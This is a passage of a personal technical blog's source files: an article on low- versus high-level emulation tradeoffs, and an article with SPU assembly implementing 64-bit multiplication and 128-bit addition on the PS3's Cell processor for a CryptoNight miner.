"*development time*", however, the "*execution time*" would be insanely high caused by simulating billions of transistors. 36 | 37 | As you see, the rule of thumb is: higher-level incurs in larger development costs, and lower-level incurs in larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the perfomance of different emulator paradigms. 38 | 39 | ## Performance myths 40 | 41 | Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balence "*development time*" vs "*execution time*" and pick the right strategy. How do you estimate those costs, specially "*execution time*", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targetting. The resulting performance will be depend on how many "*concepts*" from your *guest machine* (i.e. the thing you're trying to emulate), can be mapped into your *host machine* (the thing that will run the emulator). 42 | 43 | To give you an example, one such "*concept*" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application have access to a slice of RAM by mapping addresses of a "*virtual address space*" (an imaginary arrangement of memory) to a "*physical address space*" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one. 44 | 45 | - HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy. 46 | 47 | - LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "*guest virtual memory* to *guest physical memory*" translation by emulating the MMU on software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100's of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers: 48 | 49 | 1. Guest virtual memory 50 | 2. Guest physical memory 51 | 3. Host virtual memory 52 | 4. Host physical memory 53 | 54 | However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains. 55 | 56 | ## Conclusion 57 | 58 | By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [[1]](http://michaelbrundage.com/project/xbox-360-emulator/) and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources. 59 | 60 | Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "*performance penalty*" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail. 61 | -------------------------------------------------------------------------------- /posts/2018-04-18-lle-vs-hle/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | LLE vs HLE and their tradeoffs 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

LLE vs HLE and their tradeoffs

65 |

66 | AuthorAlexandro Sanchez 69 | Date2018-04-18 72 |

73 |

Introduction

74 |

This article aims to give an intuitive understanding for the terms "Low-Level Emulation" (LLE) and "High-Level Emulation" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.

75 |

Machines are made of several layers of abstraction, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):

76 | 83 |

That's where these "low-level" or "high-level" terms come from. Something is more "high-level" when it has more layers of abstraction below it, and it's more "low-level" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there's also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?

84 |

Emulation paradigms

85 |

Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system all about putting a "barrier" between two adjacent layers of abstraction. For instance:

86 | 90 |

Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?

91 |

When you place this "emulation" barrier between two layers, you have to reimplement the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can execute successfully. This results in two costs that you have to balance: "development time" and "execution time". Let me explain why this balance is important with few extreme examples of poor balances:

92 | 100 |

As you see, the rule of thumb is: higher-level incurs in larger development costs, and lower-level incurs in larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the perfomance of different emulator paradigms.

101 |

Performance myths

102 |

Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balence "development time" vs "execution time" and pick the right strategy. How do you estimate those costs, specially "execution time", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targetting. The resulting performance will be depend on how many "concepts" from your guest machine (i.e. the thing you're trying to emulate), can be mapped into your host machine (the thing that will run the emulator).

103 |

To give you an example, one such "concept" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application have access to a slice of RAM by mapping addresses of a "virtual address space" (an imaginary arrangement of memory) to a "physical address space" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.

104 | 118 |

However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.

119 |

Conclusion

120 |

By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [1] and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.

121 |

Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "performance penalty" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail.

122 |
123 |
124 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /posts/2019-02-16-cell-miner-alu/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2019-02-16 4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | [TOC] 9 | 10 | ## Background 11 | 12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/). 13 | 14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to revert in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further. 15 | 16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons): 17 | 18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.). 19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.) 20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.) 21 | 22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs. 23 | 24 | ## Multiplication (64-bit) 25 | 26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. Implementing such operation on the SPUs is challenging as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such multiplication. 27 | 28 | ### Theory 29 | 30 | Consider the `a` and `b` input registers, the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively. 31 | 32 | ``` 33 | 0 16 32 48 64 80 96 112 128 34 | +--------+--------+--------+--------+--------+--------+--------+--------+ 35 | a: | a0 | a1 | a2 | a3 | XX | XX | XX | XX | 36 | +--------+--------+--------+--------+--------+--------+--------+--------+ 37 | +--------+--------+--------+--------+--------+--------+--------+--------+ 38 | b: | b0 | b1 | b2 | b3 | XX | XX | XX | XX | 39 | +--------+--------+--------+--------+--------+--------+--------+--------+ 40 | MSB LSB 41 | ``` 42 | 43 | This is equivalent to the following representation: 44 | 45 | ``` 46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48) 47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48) 48 | ``` 49 | 50 | Applying the distributive property, the multiplication of both values should be equivalent to: 51 | 52 | ``` 53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) * 54 | (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)) 55 | = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) + 56 | (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) + 57 | (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) + 58 | (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96) 59 | ``` 60 | 61 | Our implementation will perform these 16 multiplications of 16-bit words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions. 62 | 63 | ### Implementation 64 | 65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*): 66 | 67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`. 68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`. 69 | 70 | When necessary, unsigned variants are available by adding an `u` suffix to the instruction name. 71 | 72 | #### 1. Multiplying half-words 73 | 74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-words pairs into 16 words. Each multiplication instruction yields a maximum of 4 32-bit words, but since only 64-bits are used in `a` and `b`, only 2 are useful. 75 | 76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64-bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary): 77 | 78 | ``` 79 | 0 16 32 48 64 80 96 112 128 80 | +--------+--------+--------+--------+--------+--------+--------+--------+ 81 | a: | a0 | a1 | a2 | a3 | a2 | a3 | a0 | a1 | 82 | +--------+--------+--------+--------+--------+--------+--------+--------+ 83 | +--------+--------+--------+--------+--------+--------+--------+--------+ 84 | b: | b0 | b1 | b2 | b3 | b0 | b1 | b2 | b3 | 85 | +--------+--------+--------+--------+--------+--------+--------+--------+ 86 | MSB LSB 87 | ``` 88 | 89 | Additionally, we left-shift by 16 both `a`, `b` into `c`, `d` respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). It does not matter whether the least significant half-word is zeroed. The result is: 90 | 91 | ``` 92 | 0 16 32 48 64 80 96 112 128 93 | +--------+--------+--------+--------+--------+--------+--------+--------+ 94 | c: | a1 | (a2) | a3 | (a2) | a3 | (a0) | a1 | (00) | 95 | +--------+--------+--------+--------+--------+--------+--------+--------+ 96 | +--------+--------+--------+--------+--------+--------+--------+--------+ 97 | d: | b1 | (b2) | b3 | (b0) | b1 | (b2) | b3 | (00) | 98 | +--------+--------+--------+--------+--------+--------+--------+--------+ 99 | MSB LSB 100 | ``` 101 | 102 | This way we can generate all necessary multiplications as follows: 103 | 104 | ``` 105 | mpy t0, a, b 106 | mpyhh t1, a, d 107 | mpyhh t2, b, c 108 | mpyhh t3, a, b 109 | ``` 110 | 111 | Leaving us with the following results: 112 | 113 | ``` 114 | 0 16 32 48 64 80 96 112 128 115 | +--------+--------+--------+--------+--------+--------+--------+--------+ 116 | t0 | a1 * b1 | a3 * b3 | a3 * b1 | a1 * b3 | 117 | +--------+--------+--------+--------+--------+--------+--------+--------+ 118 | +--------+--------+--------+--------+--------+--------+--------+--------+ 119 | t1 | a0 * b1 | a2 * b3 | a2 * b1 | a0 * b3 | 120 | +--------+--------+--------+--------+--------+--------+--------+--------+ 121 | +--------+--------+--------+--------+--------+--------+--------+--------+ 122 | t2 | b0 * a1 | b2 * a3 | b0 * a3 | b2 * a1 | 123 | +--------+--------+--------+--------+--------+--------+--------+--------+ 124 | +--------+--------+--------+--------+--------+--------+--------+--------+ 125 | t3 | a0 * b0 | a2 * b2 | a2 * b0 | a0 * b2 | 126 | +--------+--------+--------+--------+--------+--------+--------+--------+ 127 | MSB LSB 128 | ``` 129 | 130 | #### 2. Shuffling half-words 131 | 132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). These constants are: 133 | 134 | ``` 135 | 0 16 32 48 64 80 96 112 128 136 | +--------+--------+--------+--------+--------+--------+--------+--------+ 137 | t0 | t00 64 | t01 0 | t02 32 | t03 32 | 138 | +--------+--------+--------+--------+--------+--------+--------+--------+ 139 | +--------+--------+--------+--------+--------+--------+--------+--------+ 140 | t1 | t10 80 | t11 16 | t12 48 | t13 48 | 141 | +--------+--------+--------+--------+--------+--------+--------+--------+ 142 | +--------+--------+--------+--------+--------+--------+--------+--------+ 143 | t2 | t20 80 | t21 16 | t22 48 | t23 48 | 144 | +--------+--------+--------+--------+--------+--------+--------+--------+ 145 | +--------+--------+--------+--------+--------+--------+--------+--------+ 146 | t3 | t30 96 | t31 32 | t32 64 | t33 64 | 147 | +--------+--------+--------+--------+--------+--------+--------+--------+ 148 | MSB LSB 149 | ``` 150 | 151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. 16 128-bit integers to be added later on. 152 | 153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers: 154 | 155 | ``` 156 | 128 112 96 80 64 48 32 16 0 157 | +--------+--------+--------+--------+--------+--------+--------+--------+ 158 | v0 | | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### | 159 | +--------+--------+--------+--------+--------+--------+--------+--------+ 160 | +--------+--------+--------+--------+--------+--------+--------+--------+ 161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### | | 162 | +--------+--------+--------+--------+--------+--------+--------+--------+ 163 | +--------+--------+--------+--------+--------+--------+--------+--------+ 164 | v2 | | ##### t33 ##### | ##### t03 ##### | | 165 | +--------+--------+--------+--------+--------+--------+--------+--------+ 166 | +--------+--------+--------+--------+--------+--------+--------+--------+ 167 | v3 | | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### | | 168 | +--------+--------+--------+--------+--------+--------+--------+--------+ 169 | +--------+--------+--------+--------+--------+--------+--------+--------+ 170 | v4 | | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### | | 171 | +--------+--------+--------+--------+--------+--------+--------+--------+ 172 | +--------+--------+--------+--------+--------+--------+--------+--------+ 173 | v5 | | ##### t13 ##### | | 174 | +--------+--------+--------+--------+--------+--------+--------+--------+ 175 | +--------+--------+--------+--------+--------+--------+--------+--------+ 176 | v6 | | ##### t23 ##### | | 177 | +--------+--------+--------+--------+--------+--------+--------+--------+ 178 | MSB LSB 179 | ``` 180 | 181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary): 182 | 183 | ``` 184 | shufb v0, t0, t0, mask_v0 185 | shufb v1, t3, t3, mask_v1 186 | shufb v2, t0, t3, mask_v2 187 | shufb v3, t1, t1, mask_v3_v4 188 | shufb v4, t2, t2, mask_v3_v4 189 | shufb v5, t1, t1, mask_v5_v6 190 | shufb v6, t2, t2, mask_v5_v6 191 | ``` 192 | 193 | #### 3. Adding results 194 | 195 | The final step is adding the 7 resulting 28-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let such algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows: 196 | 197 | ``` 198 | add_128 t0, v0, v1 199 | add_128 t1, v2, v3 200 | add_128 t2, v4, v5 201 | add_128 t0, t0, t1 202 | add_128 t0, t0, t2 203 | add_128 r, t0, v6 204 | ``` 205 | 206 | As a final step, one might shuffle bytes again to match the desired endianness. 207 | 208 | ## Addition (128-bit) 209 | 210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness. 211 | 212 | ### Theory 213 | 214 | Consider the `a` and `b` input registers and the `s` output register, the 128-bit LHS and RHS of the addition operation composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively. 215 | 216 | ``` 217 | 0 32 64 96 128 218 | +-----------------+-----------------+-----------------+-----------------+ 219 | a: | a0 | a1 | a2 | a3 | 220 | +-----------------+-----------------+-----------------+-----------------+ 221 | +-----------------+-----------------+-----------------+-----------------+ 222 | b: | b0 | b1 | b2 | b3 | 223 | +-----------------+-----------------+-----------------+-----------------+ 224 | MSB LSB 225 | ``` 226 | 227 | This is equivalent to the following representation: 228 | 229 | ``` 230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96) 231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96) 232 | ``` 233 | 234 | Similar to four-bit adder, we perform the addition component-wise propagating the carry bit from the LSW to the MSW. We represent this carry-bit with the `overflow` (shortened as `o`), that takes an addition result and outputs 1 if the addition is >= 2^32, and 0 otherwise. 235 | 236 | ``` 237 | s3 = a3 + b3 238 | s2 = a2 + b2 + overflow(s3) 239 | s1 = a1 + b1 + overflow(s2) 240 | s0 = a0 + b0 + overflow(s1) 241 | ``` 242 | 243 | ### Implementation 244 | 245 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*): 246 | 247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`. 248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`. 249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. The result is placed in register `rt`. 250 | 251 | #### 1. Basic idea 252 | 253 | By using these instructions, we can perform this addition as follows: 254 | 255 | ``` 256 | +-----------------+-----------------+-----------------+-----------------+ 257 | t0 | t00: a0 + b0 | t01: a1 + b1 | t02: a2 + b2 | t03: a3 + b3 | 258 | +-----------------+-----------------+-----------------+-----------------+ 259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) | | 260 | +-----------------+-----------------+-----------------+-----------------+ 261 | +-----------------+-----------------+-----------------+-----------------+ 262 | t1 | t10: t00+c00 | t11: t01+c01 | t12: t02+c02 | | 263 | +-----------------+-----------------+-----------------+-----------------+ 264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) | | | 265 | +-----------------+-----------------+-----------------+-----------------+ 266 | +-----------------+-----------------+-----------------+-----------------+ 267 | t2 | t20: t10+c10 | t21: t11+c11 | | | 268 | +-----------------+-----------------+-----------------+-----------------+ 269 | c2 | c20: o(t11+c11) | | | | 270 | +-----------------+-----------------+-----------------+-----------------+ 271 | +-----------------+-----------------+-----------------+-----------------+ 272 | t3 | t30: t20+c20 | | | | 273 | +-----------------+-----------------+-----------------+-----------------+ 274 | ``` 275 | 276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions. 277 | 278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. The final output register `r` can simply be computed as [t30, t21, t12, t03]. 279 | 280 | #### 2. Optimizing register usage 281 | 282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`. 283 | 284 | The final algorithm would look like this: 285 | 286 | ``` 287 | cg t1, lhs, rhs 288 | a t0, lhs, rhs 289 | shlqbyi t1, t1, 4 290 | cg t2, t0, t1 291 | a t0, t0, t1 292 | shlqbyi t2, t2, 4 293 | cg t1, t0, t2 294 | a t0, t0, t2 295 | shlqbyi t1, t1, 4 296 | a r, t0, t1 297 | ``` 298 | 299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop. 300 | 301 | ## Sources 302 | 303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s). 304 | -------------------------------------------------------------------------------- /posts/2019-02-16-cell-miner-alu/arithmetic.s: -------------------------------------------------------------------------------- 1 | /** 2 | * SPU high-performance wide arithmetic. 3 | * Author: Alexandro Sanchez Bach . 4 | */ 5 | 6 | // Registers 7 | 8 | #define alu_reg_se32 $80 9 | #define alu_reg_se64 $81 10 | #define alu_reg_se128 $82 11 | #define alu_reg_mul_lhs $83 12 | #define alu_reg_mul_rhs $84 13 | #define alu_reg_mul_m0 $85 14 | #define alu_reg_mul_m1 $86 15 | #define alu_reg_mul_m2 $87 16 | #define alu_reg_mul_m3 $88 17 | #define alu_reg_mul_m4 $89 18 | #define alu_reg_add_m64 $90 19 | 20 | #define alu_reg_i0 $40 21 | #define alu_reg_i1 $41 22 | #define alu_reg_t0 $42 23 | #define alu_reg_t1 $43 24 | #define alu_reg_t2 $44 25 | #define alu_reg_t3 $45 26 | #define alu_reg_v0 $46 27 | #define alu_reg_v1 $47 28 | #define alu_reg_v2 $48 29 | #define alu_reg_v3 $49 30 | #define alu_reg_v4 $50 31 | #define alu_reg_v5 $51 32 | #define alu_reg_v6 $52 33 | 34 | // Constants 35 | 36 | .align 4 37 | .global alu_endian 38 | alu_endian: 39 | // swap-endian-32 40 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04 41 | .byte 0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C 42 | // swap-endian-64 43 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 44 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08 45 | // swap-endian-128 46 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08 47 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 48 | 49 | .align 4 50 | .global alu_wswap 51 | alu_wswap: 52 | // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0] 53 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 54 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04 55 | // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1] 56 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 57 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00 58 | 59 | .align 4 60 | .global alu_mul64_constants 61 | alu_mul64_constants: 62 | // v0 63 | .byte 0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03 64 | .byte 0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07 65 | // v1 66 | .byte 0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B 67 | .byte 0x04, 0x05, 0x06, 0x07, 0x80, 0x80, 0x80, 0x80 68 | // v2 69 | .byte 0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F 70 | .byte 0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80 71 | // v3+v4 72 | .byte 0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09 73 | .byte 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80 74 | // v5+v6 75 | .byte 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D 76 | .byte 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80 77 | 78 | .align 4 79 | .global alu_add64_constants 80 | alu_add64_constants: 81 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 82 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 83 | 84 | // Macros 85 | 86 | #define add_64(ret, lhs, rhs) \ 87 | shufb alu_reg_t0, lhs, lhs, alu_reg_se64 ;\ 88 | shufb alu_reg_t1, rhs, rhs, alu_reg_se64 ;\ 89 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\ 90 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\ 91 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\ 92 | and alu_reg_t2, alu_reg_t2, alu_reg_add_m64 ;\ 93 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\ 94 | shufb ret, alu_reg_t0, alu_reg_t0, alu_reg_se64 ; 95 | 96 | #define add_128(ret, lhs, rhs) \ 97 | cg alu_reg_t1, lhs, rhs ;\ 98 | a alu_reg_t0, lhs, rhs ;\ 99 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\ 100 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\ 101 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\ 102 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\ 103 | cg alu_reg_t1, alu_reg_t0, alu_reg_t2 ;\ 104 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\ 105 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\ 106 | a ret, alu_reg_t0, alu_reg_t1 ; 107 | 108 | #define mul_64(ret, lhs, rhs) \ 109 | shufb alu_reg_i0, lhs, lhs, alu_reg_mul_lhs ;\ 110 | shufb alu_reg_i1, rhs, rhs, alu_reg_mul_rhs ;\ 111 | shli alu_reg_v0, alu_reg_i0, 16 ;\ 112 | shli alu_reg_v1, alu_reg_i1, 16 ;\ 113 | mpyu alu_reg_t0, alu_reg_i0, alu_reg_i1 ;\ 114 | mpyhhu alu_reg_t1, alu_reg_i0, alu_reg_v1 ;\ 115 | mpyhhu alu_reg_t2, alu_reg_i1, alu_reg_v0 ;\ 116 | mpyhhu alu_reg_t3, alu_reg_i0, alu_reg_i1 ;\ 117 | shufb alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0 ;\ 118 | shufb alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1 ;\ 119 | shufb alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2 ;\ 120 | shufb alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3 ;\ 121 | shufb alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3 ;\ 122 | shufb alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4 ;\ 123 | shufb alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4 ;\ 124 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1) ;\ 125 | add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3) ;\ 126 | add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5) ;\ 127 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2) ;\ 128 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4) ;\ 129 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6) ;\ 130 | shufb ret, alu_reg_v0, alu_reg_v0, alu_reg_se64 ; 131 | 132 | // Functions 133 | 134 | .global alu_constants_init 135 | .type alu_constants_init, @function 136 | alu_constants_init: 137 | ila alu_reg_t0, alu_endian 138 | lqd alu_reg_se32, 0x00(alu_reg_t0) 139 | lqd alu_reg_se64, 0x10(alu_reg_t0) 140 | lqd alu_reg_se128, 0x20(alu_reg_t0) 141 | ila alu_reg_t0, alu_wswap 142 | lqd alu_reg_mul_lhs, 0x00(alu_reg_t0) 143 | lqd alu_reg_mul_rhs, 0x10(alu_reg_t0) 144 | ila alu_reg_t0, alu_mul64_constants 145 | lqd alu_reg_mul_m0, 0x00(alu_reg_t0) 146 | lqd alu_reg_mul_m1, 0x10(alu_reg_t0) 147 | lqd alu_reg_mul_m2, 0x20(alu_reg_t0) 148 | lqd alu_reg_mul_m3, 0x30(alu_reg_t0) 149 | lqd alu_reg_mul_m4, 0x40(alu_reg_t0) 150 | ila alu_reg_t0, alu_add64_constants 151 | lqd alu_reg_add_m64, 0x00(alu_reg_t0) 152 | bi $lr 153 | 